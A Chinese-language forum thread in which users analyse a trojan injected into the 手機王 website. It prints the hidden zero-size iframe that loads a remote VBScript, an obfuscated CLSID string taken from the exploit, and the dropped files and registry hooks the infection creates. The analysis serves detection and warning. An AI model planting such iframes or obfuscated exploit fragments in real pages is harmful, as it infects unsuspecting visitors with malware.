會員 | 回覆: 手機王又被植入木馬了 引用:
如 語法: j1="clsid:" j2="BD96" j3="C556-" j4="65A3-" j5="11D0-" j6="983A-" j7="00C04FC29E36" 語法: j8="clsid:BD96C556-65A3-11D0-983A-00C04FC29E36" | |
回覆 |
會員 | 回覆: 手機王又被植入木馬了 到目前為止都還未修復,而且網站無聯絡電話,真奇怪。 分析了一下,結果如下: 1. 首頁有下面的語法: <iframe src=http://www.myemage.com/V20/Daren/images/img.html width=0 height=0></iframe> 2. 下載img.html,它是一個VBScript,如前面有人說明(2.exe就是寫在這個script裡)。 3. 執行後,系統有下面的行為: DLL Injection: C:\Documents and Settings\Administrator\Local Settings\Temp\svchost.exe 注入某些執行程序(如svchost.exe)。 C:\WINDOWS\system32\gfile.dll注入某些執行程序(如explorer.exe)。 Drop files: C:\Documents and Settings\Administrator\Local Settings\Temp\svchost.exe C:\WINDOWS\system32\gfile.dll C:\WINDOWS\system32\goodfile.exe BHO/CLSID: {71177AD5-E5B5-4451-A4B0-F31C521B6557}--C:\WINDOWS\system32\gfile.dll Registry: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\ShellExecuteHooks||Value={71177AD5-E5B5-4451-A4B0-F31C521B6557} |
回覆 |
XML | RSS 2.0 | RSS |
本論壇所有文章僅代表留言者個人意見,並不代表本站之立場,討論區以「即時留言」方式運作,故無法完全監察所有即時留言,若您發現文章可能有異議,請 email :[email protected] 處理。